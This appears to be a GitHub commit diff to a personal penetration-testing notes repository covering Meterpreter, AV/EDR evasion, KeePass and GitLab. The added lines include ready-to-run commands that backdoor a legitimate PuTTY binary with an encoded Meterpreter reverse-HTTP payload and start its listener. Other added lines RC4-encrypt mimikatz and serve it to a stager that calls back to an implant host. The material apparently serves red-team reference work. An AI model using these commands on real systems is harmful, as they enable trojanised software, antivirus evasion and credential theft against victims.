[AHK] Automatic update 👽

Meditology · Mar 5, 2023 · 3346348 · 3346348
1 parent 12dc88d
commit 3346348
Show file tree

Hide file tree

Showing 5 changed files with 33 additions and 7 deletions.
diff --git a/pentest/c2/metasploit.md → pentest/c2/meterpreter.md b/pentest/c2/metasploit.md → pentest/c2/meterpreter.md
@@ -1,4 +1,4 @@
-# Metasploit
+# Meterpreter
 
 * [https://buffered.io/posts/staged-vs-stageless-handlers/](https://buffered.io/posts/staged-vs-stageless-handlers/)
 * [https://blog.rapid7.com/2015/03/25/stageless-meterpreter-payloads/](https://blog.rapid7.com/2015/03/25/stageless-meterpreter-payloads/)
@@ -80,10 +80,6 @@ msf exploit(multi/handler) > set HttpHostHeader cdn.provider.net
 msf exploit(multi/handler) > run
 ```
 
-
-
-### meterpreter
-
 Migrate to a different architecture:
 
 ```
@@ -144,6 +140,14 @@ msf post(windows/manage/shellcode_inject) > set SESSION 1
 msf post(windows/manage/shellcode_inject) > run
 ```
 
+Backdoored legit executable with delayed Stdapi loading:
+
+```
+$ wget https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe
+$ msfvenom -p windows/x64/meterpreter_reverse_http LHOST=eth0 LPORT=8088 EXITFUNC=thread -e x64/xor_dynamic -i 10 -k -x putty.exe -f exe -o evilputty.exe
+$ sudo msfconsole -qx 'use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter_reverse_http; set LHOST eth0; set LPORT 8088; set AutoLoadStdapi false; set EXITFUNC thread; run'
+```
+
 
 
 

diff --git a/pentest/infrastructure/ad/av-edr-evasion/README.md b/pentest/infrastructure/ad/av-edr-evasion/README.md
@@ -326,3 +326,18 @@ mv "C:\Windows\Temp\$target\$obf\bin\Release\$obf.exe" "\\vmware-host\Shared Fol
 #Remove-Item -Recurse -Force "C:\Windows\Temp\$target"
 ```
 {% endcode %}
+
+
+
+### stager_libpeconv
+
+- [https://github.com/tothi/stager_libpeconv](https://github.com/tothi/stager_libpeconv)
+- [https://github.com/hasherezade/libpeconv](https://github.com/hasherezade/libpeconv)
+
+```
+$ git clone --recurse-submodules https://github.com/tothi/stager_libpeconv
+$ openssl enc -rc4 -in mimikatz.exe -K `echo -n '1234567890123456' | xxd -p` -nosalt -out mimikatz.rc4
+$ make stager IMPLANT_IP=10.10.13.37 IMPLANT_PORT=1337 RC4_KEY=1234567890123456
+$ ./socket_binary_server.py mimikatz.rc4 10.10.13.37 1337
+Cmd > stager.exe
+```
diff --git a/pentest/infrastructure/ad/credential-harvesting/keepass.md b/pentest/infrastructure/ad/credential-harvesting/keepass.md
@@ -31,6 +31,13 @@ PS > (gc .\keepassxc_strings.txt).length / 1mb
 
 
 
+## DLL Hijacking
+
+- [https://skr1x.github.io/keepass-dll-hijacking/](https://skr1x.github.io/keepass-dll-hijacking/)
+
+
+
+
 ## Tools
 
 

diff --git a/pentest/infrastructure/devops/gitlab.md b/pentest/infrastructure/devops/gitlab.md
@@ -38,7 +38,7 @@ Search for credential leaks with [gitleaks](https://github.com/zricethezav/gitle
 
 ```
 $ eget -qs linux/amd64 "zricethezav/gitleaks" --to gitleaks
-$ gitleaks detect -s . -v | jq '.Match + " :: " + .File'
+$ ./gitleaks detect -s . -v | jq '.Match + " :: " + .File'
 ```
 
 

diff --git a/pentest/web/README.md b/pentest/web/README.md
@@ -160,7 +160,7 @@ $ chaos -d megacorp.com -key <API_KEY> -http-status-code -http-title -http-url -
 * [https://github.com/projectdiscovery/nuclei/releases](https://github.com/projectdiscovery/nuclei/releases)
 * [https://github.com/DingyShark/nuclei-scan-sort](https://github.com/DingyShark/nuclei-scan-sort)
 
-```console
+```
 $ nuclei -update-templates
 $ nuclei -l domains.txt [-t cves/] -o nuclei.out
 ```
Original file line number	Diff line number	Diff line change
Expand Up		@@ -31,6 +31,13 @@ PS > (gc .\keepassxc_strings.txt).length / 1mb



		## DLL Hijacking

		- [https://skr1x.github.io/keepass-dll-hijacking/](https://skr1x.github.io/keepass-dll-hijacking/)




		## Tools


Expand Down
-Original file line number
+Diff line change
@@ Expand Up @@
     ```
     $ eget -qs linux/amd64 "zricethezav/gitleaks" --to gitleaks
-    $ gitleaks detect -s . -v | jq '.Match + " :: " + .File'
+    $ ./gitleaks detect -s . -v | jq '.Match + " :: " + .File'
     ```
@@ Expand Down @@